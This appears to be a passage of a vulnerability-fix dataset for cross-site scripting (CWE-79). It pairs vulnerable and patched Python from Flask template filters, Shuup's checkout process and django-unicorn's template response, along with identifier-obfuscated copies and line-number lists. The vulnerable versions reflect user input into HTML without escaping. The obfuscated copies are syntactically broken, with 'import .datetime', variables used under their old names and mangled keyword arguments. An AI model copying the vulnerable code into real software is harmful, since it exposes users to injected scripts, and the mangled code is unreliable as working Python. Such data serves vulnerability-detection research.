@jinjia.app_template_filter('formatdateinput')
def format_date_input(val):
input_date = val.isoformat().split('T', 1)[0] # Hack to support dates <1900
return '' if input_date == "0101-01-01" else input_date
@jinjia.app_template_filter('strftime')
def timestamptodate(date, fmt=None):
date = datetime.datetime.fromtimestamp(
int(date)/1000
)
native = date.replace(tzinfo=None)
if fmt:
time_format = fmt
else:
time_format = '%d %m %Y - %H:%S'
return native.strftime(time_format)
@jinjia.app_template_filter('yesno')
def yesno(value, yes, no):
return yes if value else no
@jinjia.app_template_filter('formatfloat')
def formatfloat(value, decimals=1):
value = 0 if not value else value
return ('{0:.' + str(decimals) + 'f}').format(value).rstrip('0').rstrip('.')
@jinjia.app_template_filter('formatseriesindex')
def formatseriesindex_filter(series_index):
if series_index:
try:
if int(series_index) - series_index == 0:
return int(series_index)
else:
return series_index
except ValueError:
return series_index
return 0
@jinjia.app_template_filter('escapedlink')
def escapedlink_filter(url, text):
return "<a href='{}'>{}</a>".format(url, escape(text))
@jinjia.app_template_filter('uuidfilter')
def uuidfilter(var):
return uuid4()
| xss | {
"code": [],
"line_no": []
} | {
"code": [
"from flask_babel import gettext as _",
"from markupsafe import escape",
"@jinjia.app_template_filter('escapedlink')",
"def escapedlink_filter(url, text):"
],
"line_no": [
31,
35,
133,
134
]
} |
from __future__ import division, print_function, unicode_literals
import .datetime
import mimetypes
from uuid import uuid4
from babel.dates import format_date
from flask import Blueprint, request, url_for
from flask_babel import .get_locale
from flask_login import current_user
from . import .logger
VAR_0 = Blueprint('jinjia', __name__)
VAR_1 = logger.create()
@VAR_0.app_template_filter('url_for_other_page')
def FUNC_0(VAR_2):
VAR_14 = request.view_args.copy()
VAR_14['page'] = VAR_2
for VAR_20, VAR_5 in request.args.items():
VAR_14[VAR_20] = VAR_5
return url_for(request.endpoint, **VAR_14)
@VAR_0.app_template_filter('shortentitle')
def FUNC_1(VAR_3, VAR_4=20):
VAR_15 = VAR_3.split()
VAR_16 = "" # result
VAR_17 = 0 # overall length
for line in VAR_15:
if VAR_17 >= 60:
VAR_16 += '...'
break
if len(line) > VAR_4:
VAR_16 += line[:(VAR_4-3)] + '[..] '
VAR_17 += VAR_4+3
else:
VAR_16 += line + ' '
VAR_17 += len(line) + 1
return VAR_16.strip()
@VAR_0.app_template_filter('mimetype')
def FUNC_2(VAR_5):
return mimetypes.types_map.get('.' + VAR_5, 'application/octet-stream')
@VAR_0.app_template_filter('formatdate')
def FUNC_3(VAR_5):
try:
return format_date(VAR_5, format='medium', locale=get_locale())
except AttributeError as e:
VAR_1.error('Babel error: %VAR_3, Current user locale: %VAR_3, Current User: %s', e,
current_user.locale,
current_user.name
)
return VAR_5
@VAR_0.app_template_filter('formatdateinput')
def FUNC_4(VAR_5):
VAR_18 = VAR_5.isoformat().split('T', 1)[0] # Hack to support dates <1900
return '' if VAR_18 == "0101-01-01" else VAR_18
@VAR_0.app_template_filter('strftime')
def FUNC_5(VAR_6, VAR_7=None):
VAR_6 = datetime.datetime.fromtimestamp(
int(VAR_6)/1000
)
VAR_19 = VAR_6.replace(tzinfo=None)
if VAR_7:
VAR_21 = VAR_7
else:
VAR_21 = '%d %m %Y - %H:%S'
return VAR_19.strftime(VAR_21)
@VAR_0.app_template_filter('yesno')
def FUNC_6(VAR_8, VAR_9, VAR_10):
return VAR_9 if VAR_8 else VAR_10
@VAR_0.app_template_filter('formatfloat')
def FUNC_7(VAR_8, VAR_11=1):
VAR_8 = 0 if not VAR_8 else VAR_8
return ('{0:.' + str(VAR_11) + 'f}').format(VAR_8).rstrip('0').rstrip('.')
@VAR_0.app_template_filter('formatseriesindex')
def FUNC_8(VAR_12):
if VAR_12:
try:
if int(VAR_12) - series_index == 0:
return int(VAR_12)
else:
return VAR_12
except ValueError:
return VAR_12
return 0
@VAR_0.app_template_filter('uuidfilter')
def FUNC_9(VAR_13):
return uuid4()
|
from __future__ import division, print_function, unicode_literals
import .datetime
import mimetypes
from uuid import uuid4
from babel.dates import format_date
from flask_babel import .gettext as _
from flask import Blueprint, request, url_for
from flask_babel import .get_locale
from flask_login import current_user
from markupsafe import escape
from . import .logger
VAR_0 = Blueprint('jinjia', __name__)
VAR_1 = logger.create()
@VAR_0.app_template_filter('url_for_other_page')
def FUNC_0(VAR_2):
VAR_16 = request.view_args.copy()
VAR_16['page'] = VAR_2
for VAR_21, VAR_5 in request.args.items():
VAR_16[VAR_21] = VAR_5
return url_for(request.endpoint, **VAR_16)
@VAR_0.app_template_filter('shortentitle')
def FUNC_1(VAR_3, VAR_4=20):
VAR_14 = VAR_3.split()
VAR_17 = "" # result
VAR_18 = 0 # overall length
for line in VAR_14:
if VAR_18 >= 60:
VAR_17 += '...'
break
if len(line) > VAR_4:
VAR_17 += line[:(VAR_4-3)] + '[..] '
VAR_18 += VAR_4+3
else:
VAR_17 += line + ' '
VAR_18 += len(line) + 1
return VAR_17.strip()
@VAR_0.app_template_filter('mimetype')
def FUNC_2(VAR_5):
return mimetypes.types_map.get('.' + VAR_5, 'application/octet-stream')
@VAR_0.app_template_filter('formatdate')
def FUNC_3(VAR_5):
try:
return format_date(VAR_5, format='medium', locale=get_locale())
except AttributeError as e:
VAR_1.error('Babel error: %VAR_3, Current user locale: %VAR_3, Current User: %s', e,
current_user.locale,
current_user.name
)
return VAR_5
@VAR_0.app_template_filter('formatdateinput')
def FUNC_4(VAR_5):
VAR_19 = VAR_5.isoformat().split('T', 1)[0] # Hack to support dates <1900
return '' if VAR_19 == "0101-01-01" else VAR_19
@VAR_0.app_template_filter('strftime')
def FUNC_5(VAR_6, VAR_7=None):
VAR_6 = datetime.datetime.fromtimestamp(
int(VAR_6)/1000
)
VAR_20 = VAR_6.replace(tzinfo=None)
if VAR_7:
VAR_22 = VAR_7
else:
VAR_22 = '%d %m %Y - %H:%S'
return VAR_20.strftime(VAR_22)
@VAR_0.app_template_filter('yesno')
def FUNC_6(VAR_8, VAR_9, VAR_10):
return VAR_9 if VAR_8 else VAR_10
@VAR_0.app_template_filter('formatfloat')
def FUNC_7(VAR_8, VAR_11=1):
VAR_8 = 0 if not VAR_8 else VAR_8
return ('{0:.' + str(VAR_11) + 'f}').format(VAR_8).rstrip('0').rstrip('.')
@VAR_0.app_template_filter('formatseriesindex')
def FUNC_8(VAR_12):
if VAR_12:
try:
if int(VAR_12) - series_index == 0:
return int(VAR_12)
else:
return VAR_12
except ValueError:
return VAR_12
return 0
@VAR_0.app_template_filter('escapedlink')
def FUNC_9(VAR_13, VAR_14):
return "<a href='{}'>{}</a>".format(VAR_13, escape(VAR_14))
@VAR_0.app_template_filter('uuidfilter')
def FUNC_10(VAR_15):
return uuid4()
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
29,
34,
36,
37,
40,
41,
42,
50,
51,
52,
62,
63,
71,
72,
76,
77,
88,
89,
94,
95,
107,
108,
112,
113,
118,
119,
131,
135,
136,
137
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
29,
37,
38,
41,
42,
43,
51,
52,
53,
63,
64,
72,
73,
77,
78,
89,
90,
95,
96,
108,
109,
113,
114,
119,
120,
132,
136,
140,
141,
142
] |
1CWE-79
| # This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from collections import OrderedDict
from django.core.exceptions import ImproperlyConfigured
from django.http.response import Http404
from shuup.front.basket import get_basket
from shuup.utils.django_compat import reverse
from shuup.utils.importing import load
class CheckoutProcess(object):
horizontal_template = True
def __init__(self, phase_specs, phase_kwargs, view=None):
"""
Initialize this checkout process.
:type phase_specs: list[str]
:type phase_kwargs: dict
:type view: shuup.front.checkout.BaseCheckoutView|None
"""
self.phase_specs = phase_specs
self.phase_kwargs = phase_kwargs
self.view = view
self.request = self.phase_kwargs.get("request")
@property
def phases(self):
"""
:rtype: Iterable[CheckoutPhaseViewMixin]
"""
if not getattr(self, "_phases", None):
self._phases = self._load_phases()
return self._phases
def instantiate_phase_class(self, phase_class, **extra_kwargs):
if not phase_class.identifier: # pragma: no cover
raise ImproperlyConfigured("Error! Phase `%r` has no identifier." % phase_class)
kwargs = {}
kwargs.update(self.phase_kwargs)
kwargs.update(extra_kwargs)
phase = phase_class(checkout_process=self, horizontal_template=self.horizontal_template, **kwargs)
return phase
def _load_phases(self):
phases = OrderedDict()
for phase_spec in self.phase_specs:
phase_class = load(phase_spec)
phase = self.instantiate_phase_class(phase_class)
phases[phase_class.identifier] = phase
# check whether the phase spawns new phases,
# if so, then let's spawn then and add the phases
for spawned_phase in phase.spawn_phases(self):
phases[spawned_phase.identifier] = spawned_phase
return list(phases.values())
def get_current_phase(self, requested_phase_identifier):
found = False
for phase in self.phases:
if phase.is_valid():
phase.process()
if found or not requested_phase_identifier or requested_phase_identifier == phase.identifier:
found = True # We're at or past the requested phase
if not phase.should_skip():
return phase
if not phase.should_skip() and not phase.is_valid(): # A past phase is not valid, that's the current one
return phase
raise Http404("Error! Phase with identifier `%s` not found." % requested_phase_identifier) # pragma: no cover
def _get_next_phase(self, phases, current_phase, target_phase):
found = False
for phase in phases:
if phase.identifier == current_phase.identifier:
# Found the current one, so any valid phase from here on out is the next one
found = True
continue
if found and current_phase.identifier != target_phase.identifier:
return phase
if found and not phase.should_skip():
# Yep, that's the one
return phase
def get_next_phase(self, current_phase, target_phase):
return self._get_next_phase(self.phases, current_phase, target_phase)
def get_previous_phase(self, current_phase, target_phase):
return self._get_next_phase(reversed(self.phases), current_phase, target_phase)
def prepare_current_phase(self, phase_identifier):
current_phase = self.get_current_phase(phase_identifier)
self.add_phase_attributes(current_phase)
self.current_phase = current_phase
return current_phase
def add_phase_attributes(self, target_phase, current_phase=None):
"""
Add phase instance attributes (previous, next, etc) to the given target phase,
using the optional `current_phase` as the current phase for previous and next.
This is exposed as a public API for the benefit of phases that need to do sub-phase
initialization and dispatching, such as method phases.
"""
current_phase = current_phase or target_phase
target_phase.previous_phase = self.get_previous_phase(current_phase, target_phase)
target_phase.next_phase = self.get_next_phase(current_phase, target_phase)
target_phase.phases = self.phases
if current_phase in self.phases:
current_phase_index = self.phases.index(current_phase)
# Set up attributes that are handy for the phase bar in the templates.
for i, phase in enumerate(self.phases):
setattr(phase, "is_past", i > current_phase_index)
setattr(phase, "is_current", phase == current_phase)
setattr(phase, "is_future", i < current_phase_index)
setattr(phase, "is_previous", phase == target_phase.previous_phase)
setattr(phase, "is_next", phase == target_phase.next_phase)
return target_phase
def reset(self):
for phase in self.phases:
phase.reset()
def complete(self):
"""
To be called from a phase (`self.checkout_process.complete()`) when the checkout process is complete.
"""
self.reset()
def get_phase_url(self, phase):
# The self.view is optional for backward compatibility
if not self.view:
url_kwargs = {"phase": phase.identifier}
return reverse("shuup:checkout", kwargs=url_kwargs)
return self.view.get_phase_url(phase)
@property
def basket(self):
"""
The basket used in this checkout process.
:rtype: shuup.front.basket.objects.BaseBasket
"""
return get_basket(self.request)
class VerticalCheckoutProcess(CheckoutProcess):
horizontal_template = False
| # This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from collections import OrderedDict
from django.core.exceptions import ImproperlyConfigured
from django.http.response import Http404
from django.utils.html import escape
from shuup.front.basket import get_basket
from shuup.utils.django_compat import reverse
from shuup.utils.importing import load
class CheckoutProcess(object):
horizontal_template = True
def __init__(self, phase_specs, phase_kwargs, view=None):
"""
Initialize this checkout process.
:type phase_specs: list[str]
:type phase_kwargs: dict
:type view: shuup.front.checkout.BaseCheckoutView|None
"""
self.phase_specs = phase_specs
self.phase_kwargs = phase_kwargs
self.view = view
self.request = self.phase_kwargs.get("request")
@property
def phases(self):
"""
:rtype: Iterable[CheckoutPhaseViewMixin]
"""
if not getattr(self, "_phases", None):
self._phases = self._load_phases()
return self._phases
def instantiate_phase_class(self, phase_class, **extra_kwargs):
if not phase_class.identifier: # pragma: no cover
raise ImproperlyConfigured("Error! Phase `%r` has no identifier." % phase_class)
kwargs = {}
kwargs.update(self.phase_kwargs)
kwargs.update(extra_kwargs)
phase = phase_class(checkout_process=self, horizontal_template=self.horizontal_template, **kwargs)
return phase
def _load_phases(self):
phases = OrderedDict()
for phase_spec in self.phase_specs:
phase_class = load(phase_spec)
phase = self.instantiate_phase_class(phase_class)
phases[phase_class.identifier] = phase
# check whether the phase spawns new phases,
# if so, then let's spawn then and add the phases
for spawned_phase in phase.spawn_phases(self):
phases[spawned_phase.identifier] = spawned_phase
return list(phases.values())
def get_current_phase(self, requested_phase_identifier):
found = False
for phase in self.phases:
if phase.is_valid():
phase.process()
if found or not requested_phase_identifier or requested_phase_identifier == phase.identifier:
found = True # We're at or past the requested phase
if not phase.should_skip():
return phase
if not phase.should_skip() and not phase.is_valid(): # A past phase is not valid, that's the current one
return phase
raise Http404("Error! Phase with identifier `%s` not found." % escape(requested_phase_identifier))
def _get_next_phase(self, phases, current_phase, target_phase):
found = False
for phase in phases:
if phase.identifier == current_phase.identifier:
# Found the current one, so any valid phase from here on out is the next one
found = True
continue
if found and current_phase.identifier != target_phase.identifier:
return phase
if found and not phase.should_skip():
# Yep, that's the one
return phase
def get_next_phase(self, current_phase, target_phase):
return self._get_next_phase(self.phases, current_phase, target_phase)
def get_previous_phase(self, current_phase, target_phase):
return self._get_next_phase(reversed(self.phases), current_phase, target_phase)
def prepare_current_phase(self, phase_identifier):
current_phase = self.get_current_phase(phase_identifier)
self.add_phase_attributes(current_phase)
self.current_phase = current_phase
return current_phase
def add_phase_attributes(self, target_phase, current_phase=None):
"""
Add phase instance attributes (previous, next, etc) to the given target phase,
using the optional `current_phase` as the current phase for previous and next.
This is exposed as a public API for the benefit of phases that need to do sub-phase
initialization and dispatching, such as method phases.
"""
current_phase = current_phase or target_phase
target_phase.previous_phase = self.get_previous_phase(current_phase, target_phase)
target_phase.next_phase = self.get_next_phase(current_phase, target_phase)
target_phase.phases = self.phases
if current_phase in self.phases:
current_phase_index = self.phases.index(current_phase)
# Set up attributes that are handy for the phase bar in the templates.
for i, phase in enumerate(self.phases):
setattr(phase, "is_past", i > current_phase_index)
setattr(phase, "is_current", phase == current_phase)
setattr(phase, "is_future", i < current_phase_index)
setattr(phase, "is_previous", phase == target_phase.previous_phase)
setattr(phase, "is_next", phase == target_phase.next_phase)
return target_phase
def reset(self):
for phase in self.phases:
phase.reset()
def complete(self):
"""
To be called from a phase (`self.checkout_process.complete()`) when the checkout process is complete.
"""
self.reset()
def get_phase_url(self, phase):
# The self.view is optional for backward compatibility
if not self.view:
url_kwargs = {"phase": phase.identifier}
return reverse("shuup:checkout", kwargs=url_kwargs)
return self.view.get_phase_url(phase)
@property
def basket(self):
"""
The basket used in this checkout process.
:rtype: shuup.front.basket.objects.BaseBasket
"""
return get_basket(self.request)
class VerticalCheckoutProcess(CheckoutProcess):
horizontal_template = False
| xss | {
"code": [],
"line_no": []
} | {
"code": [
" raise Http404(\"Error! Phase with identifier `%s` not found.\" % escape(requested_phase_identifier))"
],
"line_no": [
79
]
} |
from __future__ import unicode_literals
from collections import OrderedDict
from django.core.exceptions import ImproperlyConfigured
from django.http.response import Http404
from shuup.front.basket import get_basket
from shuup.utils.django_compat import reverse
from shuup.utils.importing import load
class CLASS_0(object):
VAR_0 = True
def __init__(self, VAR_1, VAR_2, VAR_3=None):
self.phase_specs = VAR_1
self.phase_kwargs = VAR_2
self.view = VAR_3
self.request = self.phase_kwargs.get("request")
@property
def VAR_7(self):
if not getattr(self, "_phases", None):
self._phases = self._load_phases()
return self._phases
def FUNC_1(self, VAR_4, **VAR_5):
if not VAR_4.identifier: # pragma: no cover
raise ImproperlyConfigured("Error! Phase `%r` has no identifier." % VAR_4)
VAR_12 = {}
kwargs.update(self.phase_kwargs)
VAR_12.update(VAR_5)
VAR_11 = VAR_4(checkout_process=self, VAR_0=self.horizontal_template, **VAR_12)
return VAR_11
def FUNC_2(self):
VAR_7 = OrderedDict()
for phase_spec in self.phase_specs:
VAR_4 = load(phase_spec)
VAR_11 = self.instantiate_phase_class(VAR_4)
VAR_7[VAR_4.identifier] = VAR_11
for VAR_16 in VAR_11.spawn_phases(self):
VAR_7[VAR_16.identifier] = VAR_16
return list(VAR_7.values())
def FUNC_3(self, VAR_6):
VAR_13 = False
for VAR_11 in self.phases:
if VAR_11.is_valid():
VAR_11.process()
if VAR_13 or not VAR_6 or VAR_6 == VAR_11.identifier:
VAR_13 = True # We're at or past the requested VAR_11
if not VAR_11.should_skip():
return VAR_11
if not VAR_11.should_skip() and not VAR_11.is_valid(): # A past VAR_11 is not valid, that's the current one
return VAR_11
raise Http404("Error! Phase with identifier `%s` not VAR_13." % VAR_6) # pragma: no cover
def FUNC_4(self, VAR_7, VAR_8, VAR_9):
VAR_13 = False
for VAR_11 in VAR_7:
if VAR_11.identifier == VAR_8.identifier:
VAR_13 = True
continue
if VAR_13 and VAR_8.identifier != VAR_9.identifier:
return VAR_11
if VAR_13 and not VAR_11.should_skip():
return VAR_11
def FUNC_5(self, VAR_8, VAR_9):
return self._get_next_phase(self.phases, VAR_8, VAR_9)
def FUNC_6(self, VAR_8, VAR_9):
return self._get_next_phase(reversed(self.phases), VAR_8, VAR_9)
def FUNC_7(self, VAR_10):
VAR_8 = self.get_current_phase(VAR_10)
self.add_phase_attributes(VAR_8)
self.current_phase = VAR_8
return VAR_8
def FUNC_8(self, VAR_9, VAR_8=None):
VAR_8 = VAR_8 or VAR_9
target_phase.previous_phase = self.get_previous_phase(VAR_8, VAR_9)
target_phase.next_phase = self.get_next_phase(VAR_8, VAR_9)
target_phase.phases = self.phases
if VAR_8 in self.phases:
VAR_14 = self.phases.index(VAR_8)
for i, VAR_11 in enumerate(self.phases):
setattr(VAR_11, "is_past", i > VAR_14)
setattr(VAR_11, "is_current", VAR_11 == VAR_8)
setattr(VAR_11, "is_future", i < VAR_14)
setattr(VAR_11, "is_previous", VAR_11 == VAR_9.previous_phase)
setattr(VAR_11, "is_next", VAR_11 == VAR_9.next_phase)
return VAR_9
def FUNC_9(self):
for VAR_11 in self.phases:
VAR_11.reset()
def FUNC_10(self):
self.reset()
def FUNC_11(self, VAR_11):
if not self.view:
VAR_15 = {"phase": VAR_11.identifier}
return reverse("shuup:checkout", VAR_12=VAR_15)
return self.view.get_phase_url(VAR_11)
@property
def FUNC_12(self):
return get_basket(self.request)
class CLASS_1(CLASS_0):
VAR_0 = False
|
from __future__ import unicode_literals
from collections import OrderedDict
from django.core.exceptions import ImproperlyConfigured
from django.http.response import Http404
from django.utils.html import escape
from shuup.front.basket import get_basket
from shuup.utils.django_compat import reverse
from shuup.utils.importing import load
class CLASS_0(object):
VAR_0 = True
def __init__(self, VAR_1, VAR_2, VAR_3=None):
self.phase_specs = VAR_1
self.phase_kwargs = VAR_2
self.view = VAR_3
self.request = self.phase_kwargs.get("request")
@property
def VAR_7(self):
if not getattr(self, "_phases", None):
self._phases = self._load_phases()
return self._phases
def FUNC_1(self, VAR_4, **VAR_5):
if not VAR_4.identifier: # pragma: no cover
raise ImproperlyConfigured("Error! Phase `%r` has no identifier." % VAR_4)
VAR_12 = {}
kwargs.update(self.phase_kwargs)
VAR_12.update(VAR_5)
VAR_11 = VAR_4(checkout_process=self, VAR_0=self.horizontal_template, **VAR_12)
return VAR_11
def FUNC_2(self):
VAR_7 = OrderedDict()
for phase_spec in self.phase_specs:
VAR_4 = load(phase_spec)
VAR_11 = self.instantiate_phase_class(VAR_4)
VAR_7[VAR_4.identifier] = VAR_11
for VAR_16 in VAR_11.spawn_phases(self):
VAR_7[VAR_16.identifier] = VAR_16
return list(VAR_7.values())
def FUNC_3(self, VAR_6):
VAR_13 = False
for VAR_11 in self.phases:
if VAR_11.is_valid():
VAR_11.process()
if VAR_13 or not VAR_6 or VAR_6 == VAR_11.identifier:
VAR_13 = True # We're at or past the requested VAR_11
if not VAR_11.should_skip():
return VAR_11
if not VAR_11.should_skip() and not VAR_11.is_valid(): # A past VAR_11 is not valid, that's the current one
return VAR_11
raise Http404("Error! Phase with identifier `%s` not VAR_13." % escape(VAR_6))
def FUNC_4(self, VAR_7, VAR_8, VAR_9):
VAR_13 = False
for VAR_11 in VAR_7:
if VAR_11.identifier == VAR_8.identifier:
VAR_13 = True
continue
if VAR_13 and VAR_8.identifier != VAR_9.identifier:
return VAR_11
if VAR_13 and not VAR_11.should_skip():
return VAR_11
def FUNC_5(self, VAR_8, VAR_9):
return self._get_next_phase(self.phases, VAR_8, VAR_9)
def FUNC_6(self, VAR_8, VAR_9):
return self._get_next_phase(reversed(self.phases), VAR_8, VAR_9)
def FUNC_7(self, VAR_10):
VAR_8 = self.get_current_phase(VAR_10)
self.add_phase_attributes(VAR_8)
self.current_phase = VAR_8
return VAR_8
def FUNC_8(self, VAR_9, VAR_8=None):
VAR_8 = VAR_8 or VAR_9
target_phase.previous_phase = self.get_previous_phase(VAR_8, VAR_9)
target_phase.next_phase = self.get_next_phase(VAR_8, VAR_9)
target_phase.phases = self.phases
if VAR_8 in self.phases:
VAR_14 = self.phases.index(VAR_8)
for i, VAR_11 in enumerate(self.phases):
setattr(VAR_11, "is_past", i > VAR_14)
setattr(VAR_11, "is_current", VAR_11 == VAR_8)
setattr(VAR_11, "is_future", i < VAR_14)
setattr(VAR_11, "is_previous", VAR_11 == VAR_9.previous_phase)
setattr(VAR_11, "is_next", VAR_11 == VAR_9.next_phase)
return VAR_9
def FUNC_9(self):
for VAR_11 in self.phases:
VAR_11.reset()
def FUNC_10(self):
self.reset()
def FUNC_11(self, VAR_11):
if not self.view:
VAR_15 = {"phase": VAR_11.identifier}
return reverse("shuup:checkout", VAR_12=VAR_15)
return self.view.get_phase_url(VAR_11)
@property
def FUNC_12(self):
return get_basket(self.request)
class CLASS_1(CLASS_0):
VAR_0 = False
| [
1,
2,
3,
4,
5,
6,
8,
12,
16,
17,
20,
24,
33,
42,
51,
54,
59,
60,
61,
64,
66,
79,
84,
87,
90,
92,
94,
97,
100,
106,
111,
121,
129,
133,
139,
141,
146,
151,
155,
156,
159,
22,
23,
24,
25,
26,
27,
28,
36,
37,
38,
108,
109,
110,
111,
112,
113,
114,
135,
136,
137,
149,
150,
151,
152,
153
] | [
1,
2,
3,
4,
5,
6,
8,
13,
17,
18,
21,
25,
34,
43,
52,
55,
60,
61,
62,
65,
67,
80,
85,
88,
91,
93,
95,
98,
101,
107,
112,
122,
130,
134,
140,
142,
147,
152,
156,
157,
160,
23,
24,
25,
26,
27,
28,
29,
37,
38,
39,
109,
110,
111,
112,
113,
114,
115,
136,
137,
138,
150,
151,
152,
153,
154
] |
1CWE-79
| import logging
from django.template.response import TemplateResponse
from django.utils.safestring import mark_safe
import orjson
from bs4 import BeautifulSoup
from bs4.element import Tag
from bs4.formatter import HTMLFormatter
from django_unicorn.utils import sanitize_html
from ..decorators import timed
from ..utils import generate_checksum
logger = logging.getLogger(__name__)
class UnsortedAttributes(HTMLFormatter):
"""
Prevent beautifulsoup from re-ordering attributes.
"""
def attributes(self, tag: Tag):
for k, v in tag.attrs.items():
yield k, v
class UnicornTemplateResponse(TemplateResponse):
def __init__(
self,
template,
request,
context=None,
content_type=None,
status=None,
charset=None,
using=None,
component=None,
init_js=False,
**kwargs,
):
super().__init__(
template=template,
request=request,
context=context,
content_type=content_type,
status=status,
charset=charset,
using=using,
)
self.component = component
self.init_js = init_js
@timed
def render(self):
response = super().render()
if not self.component or not self.component.component_id:
return response
content = response.content.decode("utf-8")
frontend_context_variables = self.component.get_frontend_context_variables()
frontend_context_variables_dict = orjson.loads(frontend_context_variables)
checksum = generate_checksum(orjson.dumps(frontend_context_variables_dict))
soup = BeautifulSoup(content, features="html.parser")
root_element = get_root_element(soup)
root_element["unicorn:id"] = self.component.component_id
root_element["unicorn:name"] = self.component.component_name
root_element["unicorn:key"] = self.component.component_key
root_element["unicorn:checksum"] = checksum
# Generate the hash based on the rendered content (without script tag)
hash = generate_checksum(UnicornTemplateResponse._desoupify(soup))
if self.init_js:
init = {
"id": self.component.component_id,
"name": self.component.component_name,
"key": self.component.component_key,
"data": orjson.loads(frontend_context_variables),
"calls": self.component.calls,
"hash": hash,
}
init = orjson.dumps(init).decode("utf-8")
json_element_id = f"unicorn:data:{self.component.component_id}"
init_script = f"Unicorn.componentInit(JSON.parse(document.getElementById('{json_element_id}').textContent));"
json_tag = soup.new_tag("script")
json_tag["type"] = "application/json"
json_tag["id"] = json_element_id
json_tag.string = sanitize_html(init)
if self.component.parent:
self.component._init_script = init_script
self.component._json_tag = json_tag
else:
json_tags = []
json_tags.append(json_tag)
for child in self.component.children:
init_script = f"{init_script} {child._init_script}"
json_tags.append(child._json_tag)
script_tag = soup.new_tag("script")
script_tag["type"] = "module"
script_tag.string = f"if (typeof Unicorn === 'undefined') {{ console.error('Unicorn is missing. Do you need {{% load unicorn %}} or {{% unicorn_scripts %}}?') }} else {{ {init_script} }}"
root_element.insert_after(script_tag)
for t in json_tags:
root_element.insert_after(t)
rendered_template = UnicornTemplateResponse._desoupify(soup)
rendered_template = mark_safe(rendered_template)
self.component.rendered(rendered_template)
response.content = rendered_template
return response
@staticmethod
def _desoupify(soup):
    """Serialize *soup* to a UTF-8 string, keeping attribute order intact."""
    soup.smooth()
    encoded = soup.encode(formatter=UnsortedAttributes())
    return encoded.decode("utf-8")
def get_root_element(soup: BeautifulSoup) -> Tag:
    """
    Return the first actual tag element in the parsed document.

    Args:
        soup: Parsed BeautifulSoup document.

    Returns:
        The first ``Tag`` child of the soup.

    Raises:
        Exception: If no tag element exists.
    """
    root = next(
        (node for node in soup.contents if isinstance(node, Tag) and node.name),
        None,
    )

    if root is None:
        raise Exception("No root element found")

    return root
| import logging
from django.template.response import TemplateResponse
import orjson
from bs4 import BeautifulSoup
from bs4.dammit import EntitySubstitution
from bs4.element import Tag
from bs4.formatter import HTMLFormatter
from django_unicorn.utils import sanitize_html
from ..decorators import timed
from ..utils import generate_checksum
logger = logging.getLogger(__name__)
class UnsortedAttributes(HTMLFormatter):
    """
    HTML formatter that emits tag attributes in their original insertion
    order instead of beautifulsoup's default alphabetical sorting.
    """

    def __init__(self):
        super().__init__(entity_substitution=EntitySubstitution.substitute_html)

    def attributes(self, tag: Tag):
        """Yield ``(name, value)`` pairs exactly as stored on *tag*."""
        for name, value in tag.attrs.items():
            yield name, value
class UnicornTemplateResponse(TemplateResponse):
def __init__(
    self,
    template,
    request,
    context=None,
    content_type=None,
    status=None,
    charset=None,
    using=None,
    component=None,
    init_js=False,
    **kwargs,
):
    """
    Template response that knows about its unicorn component.

    Args:
        component: The unicorn component being rendered, if any.
        init_js: Whether to inject the JavaScript initialization payload.

    All other arguments are forwarded to ``TemplateResponse``.
    """
    # Stash unicorn-specific state before delegating; the base class
    # does not touch these attributes.
    self.component = component
    self.init_js = init_js

    super().__init__(
        template=template,
        request=request,
        context=context,
        content_type=content_type,
        status=status,
        charset=charset,
        using=using,
    )
@timed
def render(self):
    """
    Render the template response, then decorate the component's root
    element with ``unicorn:*`` attributes and, when ``init_js`` is set,
    inject the JSON state payload and module init script.

    Returns the mutated response object.
    """
    response = super().render()

    # Nothing to decorate without a bound component.
    if not self.component or not self.component.component_id:
        return response

    content = response.content.decode("utf-8")

    # Checksum covers the serialized frontend state so the client side
    # can detect a stale or tampered payload.
    frontend_context_variables = self.component.get_frontend_context_variables()
    frontend_context_variables_dict = orjson.loads(frontend_context_variables)
    checksum = generate_checksum(orjson.dumps(frontend_context_variables_dict))

    soup = BeautifulSoup(content, features="html.parser")
    root_element = get_root_element(soup)
    root_element["unicorn:id"] = self.component.component_id
    root_element["unicorn:name"] = self.component.component_name
    root_element["unicorn:key"] = self.component.component_key
    root_element["unicorn:checksum"] = checksum

    # Generate the hash based on the rendered content (without script tag)
    # NOTE: `hash` shadows the builtin; kept as-is here.
    hash = generate_checksum(UnicornTemplateResponse._desoupify(soup))

    if self.init_js:
        init = {
            "id": self.component.component_id,
            "name": self.component.component_name,
            "key": self.component.component_key,
            "data": orjson.loads(frontend_context_variables),
            "calls": self.component.calls,
            "hash": hash,
        }
        init = orjson.dumps(init).decode("utf-8")
        json_element_id = f"unicorn:data:{self.component.component_id}"
        init_script = f"Unicorn.componentInit(JSON.parse(document.getElementById('{json_element_id}').textContent));"

        # State ships in an inert application/json script tag; the payload
        # is sanitized so it cannot break out of the tag.
        json_tag = soup.new_tag("script")
        json_tag["type"] = "application/json"
        json_tag["id"] = json_element_id
        json_tag.string = sanitize_html(init)

        if self.component.parent:
            # Child components defer their tag insertion to the root parent.
            self.component._init_script = init_script
            self.component._json_tag = json_tag
        else:
            json_tags = []
            json_tags.append(json_tag)

            # Fold every child's init call into one module script.
            for child in self.component.children:
                init_script = f"{init_script} {child._init_script}"
                json_tags.append(child._json_tag)

            script_tag = soup.new_tag("script")
            script_tag["type"] = "module"
            script_tag.string = f"if (typeof Unicorn === 'undefined') {{ console.error('Unicorn is missing. Do you need {{% load unicorn %}} or {{% unicorn_scripts %}}?') }} else {{ {init_script} }}"
            root_element.insert_after(script_tag)

            for t in json_tags:
                root_element.insert_after(t)

    rendered_template = UnicornTemplateResponse._desoupify(soup)
    self.component.rendered(rendered_template)

    response.content = rendered_template

    return response
@staticmethod
def _desoupify(soup):
    """Serialize *soup* to a UTF-8 string, keeping attribute order intact."""
    soup.smooth()
    encoded = soup.encode(formatter=UnsortedAttributes())
    return encoded.decode("utf-8")
